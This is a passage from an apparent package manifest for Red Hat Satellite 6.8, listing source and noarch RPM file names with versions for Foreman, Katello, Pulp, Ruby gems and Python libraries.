ntfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-redhat_access-2.2.18-1.el7sat.src.rpm\ntfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.src.rpm\ntfm-rubygem-redis-4.1.2-2.el7sat.src.rpm\ntfm-rubygem-representable-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-responders-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm\ntfm-rubygem-retriable-3.1.2-1.el7sat.src.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm\ntfm-rubygem-roadie-3.4.0-3.el7sat.src.rpm\ntfm-rubygem-roadie-rails-2.1.1-2.el7sat.src.rpm\ntfm-rubygem-robotex-1.0.0-21.el7sat.src.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm\ntfm-rubygem-ruby2ruby-2.4.2-3.el7sat.src.rpm\ntfm-rubygem-ruby_parser-3.10.1-2.el7sat.src.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm\ntfm-rubygem-runcible-2.13.0-2.el7sat.src.rpm\ntfm-rubygem-safemode-1.3.5-2.el7sat.src.rpm\ntfm-rubygem-scoped_search-4.1.9-1.el7sat.src.rpm\ntfm-rubygem-secure_headers-6.3.0-2.el7sat.src.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm\ntfm-rubygem-sexp_processor-4.10.0-5.el7sat.src.rpm\ntfm-rubygem-sidekiq-5.2.7-3.el7sat.src.rpm\ntfm-rubygem-signet-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm\ntfm-rubygem-sprockets-3.7.2-6.el7sat.src.rpm\ntfm-rubygem-sprockets-rails-3.2.1-6.el7sat.src.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm\ntfm-rubygem-sshkey-1.9.0-3.el7sat.src.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm\ntfm-rubygem-stomp-1.4.9-1.el7sat.src.rpm\ntfm-rubygem-text-1.3.0-7.el7sat.src.rpm\ntfm-rubygem-thor-1.0.1-2.el7sat.src.rpm\ntfm-rubygem-thread_safe-0.3.6-5.el7sat.src.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm\ntfm-rubygem-timeliness-0.3.10-1.el7sat.src.rpm\ntfm-rubygem-tzinfo-1.2.6-1.el7sat.src.rpm\ntfm-rubygem-uber-0.1.0-1.el7sat.src.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.src.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm\ntfm-rubygem-unicode-0.4.4.4-1.el7sat.src.rpm\ntfm-rubygem-unicode-display_width-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.src.rpm\ntfm-rubygem-webpack-rails-0.9.8-6.el7sat.src.rpm\ntfm-rubygem-websocket-driver-0.7.1-1.el7sat.src.rpm\ntfm-rubygem-websocket-extensions-0.1.5-1.el7sat.src.rpm\ntfm-rubygem-will_paginate-3.1.7-3.el7sat.src.rpm\ntfm-rubygem-x-editable-rails-1.5.5-5.el7sat.src.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm\ntfm-rubygem-zeitwerk-2.2.2-1.el7sat.src.rpm\n\nnoarch:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm\nansible-runner-1.4.6-1.el7ar.noarch.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm\ncandlepin-3.1.21-1.el7sat.noarch.rpm\ncandlepin-selinux-3.1.21-1.el7sat.noarch.rpm\ncrane-selinux-3.4.0-1.el7sat.noarch.rpm\nforeman-2.1.2.19-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm\nforeman-cli-2.1.2.19-1.el7sat.noarch.rpm\nforeman-debug-2.1.2.19-1.el7sat.noarch.rpm\nforeman-discovery-image-3.6.7-1.el7sat.noarch.rpm\nforeman-dynflow-sidekiq-2.1.2.19-1.el7sat.noarch.rpm\nforeman-ec2-2.1.2.19-1.el7sat.noarch.rpm\nforeman-gce-2.1.2.19-1.el7sat.noarch.rpm\nforeman-installer-2.1.2.8-1.el7sat.noarch.rpm\nforeman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm\nforeman-journald-2.1.2.19-1.el7sat.noarch.rpm\nforeman-libvirt-2.1.2.19-1.el7sat.noarch.rpm\nforeman-openstack-2.1.2.19-1.el7sat.noarch.rpm\nforeman-ovirt-2.1.2.19-1.el7sat.noarch.rpm\nforeman-postgresql-2.1.2.19-1.el7sat.noarch.rpm\nforeman-proxy-2.1.2-2.el7sat.noarch.rpm\nforeman-proxy-content-3.16.0-1.el7sat.noarch.rpm\nforeman-proxy-journald-2.1.2-2.el7sat.noarch.rpm\nforeman-selinux-2.1.2.3-1.el7sat.noarch.rpm\nforeman-service-2.1.2.19-1.el7sat.noarch.rpm\nforeman-telemetry-2.1.2.19-1.el7sat.noarch.rpm\nforeman-vmware-2.1.2.19-1.el7sat.noarch.rpm\nkatello-3.16.0-1.el7sat.noarch.rpm\nkatello-certs-tools-2.7.1-1.el7sat.noarch.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm\nkatello-common-3.16.0-1.el7sat.noarch.rpm\nkatello-debug-3.16.0-1.el7sat.noarch.rpm\nkatello-selinux-3.4.0-1.el7sat.noarch.rpm\nkeycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm\nkobo-0.5.1-1.el7sat.noarch.rpm\npulp-admin-client-2.21.3-1.el7sat.noarch.rpm\npulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm\npulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm\npulp-katello-1.0.3-1.el7sat.noarch.rpm\npulp-maintenance-2.21.3-1.el7sat.noarch.rpm\npulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm\npulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm\npulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-tools-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-selinux-2.21.3-1.el7sat.noarch.rpm\npulp-server-2.21.3-1.el7sat.noarch.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm\npuppetserver-6.13.0-1.el7sat.noarch.rpm\npython-blinker-1.3-2.el7sat.noarch.rpm\npython-gnupg-0.3.7-1.el7ui.noarch.rpm\npython-gofer-2.12.5-7.el7sat.noarch.rpm\npython-gofer-qpid-2.12.5-7.el7sat.noarch.rpm\npython-kid-0.9.6-11.el7sat.noarch.rpm\npython-mongoengine-0.10.5-2.el7sat.noarch.rpm\npython-nectar-1.6.2-1.el7sat.noarch.rpm\npython-oauth2-1.5.211-8.el7sat.noarch.rpm\npython-pulp-bindings-2.21.3-1.el7sat.noarch.rpm\npython-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-common-2.21.3-1.el7sat.noarch.rpm\npython-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm\npython-pulp-integrity-2.21.3-2.el7sat.noarch.rpm\npython-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm\npython-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm\npython-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm\npython-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-streamer-2.21.3-1.el7sat.noarch.rpm\npython-qpid-1.35.0-5.el7.noarch.rpm\npython-semantic_version-2.2.0-6.el7sat.noarch.rpm\npython2-amqp-2.2.2-5.el7sat.noarch.rpm\npython2-ansible-runner-1.4.6-1.el7ar.noarch.rpm\npython2-anyjson-0.3.3-11.el7sat.noarch.rpm\npython2-apypie-0.2.2-1.el7sat.noarch.rpm\npython2-celery-4.0.2-9.el7sat.noarch.rpm\npython2-click-6.7-9.el7sat.noarch.rpm\npython2-crane-3.3.1-9.el7sat.noarch.rpm\npython2-daemon-2.1.2-7.el7at.noarch.rpm\npython2-django-1.11.29-1.el7sat.noarch.rpm\npython2-flask-0.12.2-4.el7sat.noarch.rpm\npython2-future-0.16.0-11.el7sat.noarch.rpm\npython2-isodate-0.5.4-12.el7sat.noarch.rpm\npython2-itsdangerous-0.24-15.el7sat.noarch.rpm\npython2-jinja2-2.10-10.el7sat.noarch.rpm\npython2-jmespath-0.9.0-6.el7_7.noarch.rpm\npython2-keycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm\npython2-kombu-4.0.2-13.el7sat.noarch.rpm\npython2-lockfile-0.11.0-10.el7ar.noarch.rpm\npython2-okaara-1.0.37-2.el7sat.noarch.rpm\npython2-pexpect-4.6-1.el7at.noarch.rpm\npython2-ptyprocess-0.5.2-3.el7at.noarch.rpm\npython2-vine-1.1.3-6.el7sat.noarch.rpm\npython2-werkzeug-0.12.2-5.el7sat.noarch.rpm\npython3-async-timeout-3.0.1-2.el7ar.noarch.rpm\npython3-attrs-19.3.0-3.el7ar.noarch.rpm\npython3-chardet-3.0.4-10.el7ar.noarch.rpm\npython3-dateutil-2.8.1-2.el7ar.noarch.rpm\npython3-idna-2.4-2.el7ar.noarch.rpm\npython3-idna-ssl-1.1.0-2.el7ar.noarch.rpm\npython3-prometheus-client-0.7.1-2.el7ar.noarch.rpm\npython3-receptor-satellite-1.2.0-1.el7sat.noarch.rpm\npython3-six-1.11.0-8.el7ar.noarch.rpm\npython3-typing-extensions-3.7.4.1-2.el7ar.noarch.rpm\nqpid-dispatch-tools-1.5.0-4.el7.noarch.rpm\nqpid-tools-1.36.0-28.el7amq.noarch.rpm\nreceptor-0.6.3-1.el7ar.noarch.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm\nrepoview-0.6.6-11.el7sat.noarch.rpm\nrhel8-kickstart-setup-0.0.2-1.el7sat.noarch.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm\nrubygem-foreman_scap_client-0.4.6-1.el7sat.noarch.rpm\nrubygem-highline-1.7.8-3.el7sat.noarch.rpm\nrubygem-oauth-0.5.4-2.el7sat.noarch.rpm\nrubygem-rack-1.6.12-1.el7sat.noarch.rpm\nrubygem-rake-0.9.2.2-41.el7sat.noarch.rpm\nsatellite-6.8.0-1.el7sat.noarch.rpm\nsatellite-capsule-6.8.0-1.el7sat.noarch.rpm\nsatellite-cli-6.8.0-1.el7sat.noarch.rpm\nsatellite-common-6.8.0-1.el7sat.noarch.rpm\nsatellite-debug-tools-6.8.0-1.el7sat.noarch.rpm\nsatellite-installer-6.8.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-actioncable-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionmailer-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionpack-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actiontext-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionview-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activejob-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activemodel-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activerecord-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activerecord-import-1.0.0-6.el7sat.noarch.rpm\ntfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.noarch.rpm\ntfm-rubygem-activestorage-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activesupport-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-addressable-2.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm\ntfm-rubygem-amazing_print-1.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-ancestry-3.0.7-1.el7sat.noarch.rpm\ntfm-rubygem-anemone-0.7.2-22.el7sat.noarch.rpm\ntfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm\ntfm-rubygem-apipie-bindings-0.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-apipie-dsl-2.2.2-2.el7sat.noarch.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-apipie-rails-0.5.17-3.el7sat.noarch.rpm\ntfm-rubygem-audited-4.9.0-3.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat.noarch.rpm\ntfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat.noarch.rpm\ntfm-rubygem-builder-3.2.4-1.el7sat.noarch.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm\ntfm-rubygem-coffee-rails-5.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-coffee-script-2.4.1-4.el7sat.noarch.rpm\ntfm-rubygem-coffee-script-source-1.12.2-4.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm\ntfm-rubygem-connection_pool-2.2.2-2.el7sat.noarch.rpm\ntfm-rubygem-crass-1.0.6-1.el7sat.noarch.rpm\ntfm-rubygem-css_parser-1.4.7-3.el7sat.noarch.rpm\ntfm-rubygem-daemons-1.2.3-7.el7sat.noarch.rpm\ntfm-rubygem-deacon-1.0.0-4.el7sat.noarch.rpm\ntfm-rubygem-declarative-0.0.10-1.el7sat.noarch.rpm\ntfm-rubygem-declarative-option-0.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-deep_cloneable-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-deface-1.5.3-2.el7sat.noarch.rpm\ntfm-rubygem-diffy-3.0.1-6.el7sat.noarch.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-erubi-1.9.0-1.el7sat.noarch.rpm\ntfm-rubygem-excon-0.58.0-3.el7sat.noarch.rpm\ntfm-rubygem-execjs-2.7.0-4.el7sat.noarch.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm\ntfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat.noarch.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm\ntfm-rubygem-fast_gettext-1.4.1-3.el7sat.noarch.rpm\ntfm-rubygem-fog-aws-3.6.5-1.el7sat.noarch.rpm\ntfm-rubygem-fog-core-2.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-fog-google-1.8.2-1.el7sat.noarch.rpm\ntfm-rubygem-fog-json-1.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.noarch.rpm\ntfm-rubygem-fog-libvirt-0.7.0-1.el7sat.noarch.rpm\ntfm-rubygem-fog-openstack-1.0.8-2.el7sat.noarch.rpm\ntfm-rubygem-fog-ovirt-1.2.5-1.el7sat.noarch.rpm\ntfm-rubygem-fog-vsphere-3.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-fog-xml-0.1.2-8.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible-5.1.3-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_discovery-16.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_hooks-0.3.16-2.el7sat.noarch.rpm\ntfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_leapp-0.1.6-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution-cockpit-3.3.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.noarch.rpm\ntfm-rubygem-formatador-0.2.1-11.el7sat.noarch.rpm\ntfm-rubygem-friendly_id-5.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-fx-0.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-get_process_mem-0.2.1-3.el7sat.noarch.rpm\ntfm-rubygem-gettext-3.1.4-10.el7sat.noarch.rpm\ntfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.noarch.rpm\ntfm-rubygem-git-1.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.noarch.rpm\ntfm-rubygem-globalid-0.4.2-1.el7sat.noarch.rpm\ntfm-rubygem-google-api-client-0.23.9-3.el7sat.noarch.rpm\ntfm-rubygem-googleauth-0.6.7-3.el7sat.noarch.rpm\ntfm-rubygem-graphql-1.8.14-1.el7sat.noarch.rpm\ntfm-rubygem-graphql-batch-0.3.10-1.el7sat.noarch.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli-2.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.noarch.rpm\ntfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.noarch.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm\ntfm-rubygem-http-3.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm\ntfm-rubygem-http-form_data-2.1.1-1.el7sat.noarch.rpm\ntfm-rubygem-httpclient-2.8.3-1.el7sat.noarch.rpm\ntfm-rubygem-i18n-1.8.2-1.el7sat.noarch.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-ipaddress-0.8.0-11.el7sat.noarch.rpm\ntfm-rubygem-jgrep-1.3.3-12.el7sat.noarch.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm\ntfm-rubygem-katello-3.16.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-kubeclient-4.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-ldap_fluff-0.4.7-5.el7sat.noarch.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-locale-2.0.9-13.el7sat.noarch.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-loofah-2.4.0-1.el7sat.noarch.rpm\ntfm-rubygem-mail-2.7.1-1.el7sat.noarch.rpm\ntfm-rubygem-marcel-0.3.3-1.el7sat.noarch.rpm\ntfm-rubygem-memoist-0.16.0-1.el7sat.noarch.rpm\ntfm-rubygem-method_source-0.9.2-2.el7sat.noarch.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm\ntfm-rubygem-mimemagic-0.3.5-1.el7sat.noarch.rpm\ntfm-rubygem-mini_mime-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-mini_portile2-2.4.0-1.el7sat.noarch.rpm\ntfm-rubygem-ms_rest-0.7.4-2.el7sat.noarch.rpm\ntfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.noarch.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm\ntfm-rubygem-net-ldap-0.16.1-1.el7sat.noarch.rpm\ntfm-rubygem-net-ping-2.0.1-3.el7sat.noarch.rpm\ntfm-rubygem-net-scp-1.2.1-3.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-oauth-0.5.4-3.el7sat.noarch.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm\ntfm-rubygem-optimist-3.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-os-1.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.noarch.rpm\ntfm-rubygem-parse-cron-0.1.4-4.el7sat.noarch.rpm\ntfm-rubygem-polyglot-0.3.5-3.el7sat.noarch.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-prometheus-client-1.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-promise.rb-0.7.4-1.el7sat.noarch.rpm\ntfm-rubygem-public_suffix-3.0.3-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.noarch.rpm\ntfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_container_client-1.4.1-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_file_client-1.0.1-1.el7sat.noarch.rpm\ntfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.noarch.rpm\ntfm-rubygem-pulpcore_client-3.4.1-1.el7sat.noarch.rpm\ntfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-quantile-0.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-rabl-0.14.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-cors-1.0.2-1.el7sat.noarch.rpm\ntfm-rubygem-rack-jsonp-1.3.1-9.el7sat.noarch.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-rack-test-1.1.0-4.el7sat.noarch.rpm\ntfm-rubygem-rails-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.noarch.rpm\ntfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-rails-i18n-6.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-railties-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-rainbow-2.2.1-5.el7sat.noarch.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm\ntfm-rubygem-rbovirt-0.1.7-4.el7sat.noarch.rpm\ntfm-rubygem-rbvmomi-2.2.0-3.el7sat.noarch.rpm\ntfm-rubygem-record_tag_helper-1.0.1-3.el7sat.noarch.rpm\ntfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-redhat_access-2.2.18-1.el7sat.noarch.rpm\ntfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-redis-4.1.2-2.el7sat.noarch.rpm\ntfm-rubygem-representable-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-responders-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm\ntfm-rubygem-retriable-3.1.2-1.el7sat.noarch.rpm\ntfm-rubygem-roadie-3.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-roadie-rails-2.1.1-2.el7sat.noarch.rpm\ntfm-rubygem-robotex-1.0.0-21.el7sat.noarch.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm\ntfm-rubygem-ruby2ruby-2.4.2-3.el7sat.noarch.rpm\ntfm-rubygem-ruby_parser-3.10.1-2.el7sat.noarch.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm\ntfm-rubygem-runcible-2.13.0-2.el7sat.noarch.rpm\ntfm-rubygem-safemode-1.3.5-2.el7sat.noarch.rpm\ntfm-rubygem-scoped_search-4.1.9-1.el7sat.noarch.rpm\ntfm-rubygem-secure_headers-6.3.0-2.el7sat.noarch.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm\ntfm-rubygem-sexp_processor-4.10.0-5.el7sat.noarch.rpm\ntfm-rubygem-sidekiq-5.2.7-3.el7sat.noarch.rpm\ntfm-rubygem-signet-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy